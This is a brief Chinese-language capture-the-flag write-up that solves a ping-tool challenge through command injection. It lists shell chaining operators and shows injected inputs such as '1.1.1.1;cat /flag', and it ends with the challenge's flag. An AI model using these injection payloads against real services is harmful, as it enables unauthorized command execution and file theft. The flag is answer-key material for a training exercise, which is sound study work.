是一个ping,联系题目名称基本确定是命令执行漏洞
命令执行常用特殊字符
windows系统:
cmd1|cmd2:无论cmd1是否执行成功,cmd2将被执行
cmd1||cmd2:仅在cmd1执行失败时才执行cmd2
cmd1&&cmd2:仅在cmd1执行成功后才执行cmd2
cmd1&cmd2:一起执行,互不影响
Linux系统:(多一个;)
cmd1;cmd2:无论cmd1是否执行成功,cmd2将被执行
试了一下1.1.1.1;ls,有正确回显,说明;没有被过滤掉
ping 1.1.1.1;ls /,显示根目录下的文件
查看flag文件,ping 1.1.1.1;cat /flag
flag{729a0b0a-36ec-44ea-bd30-8e2a3f27483d}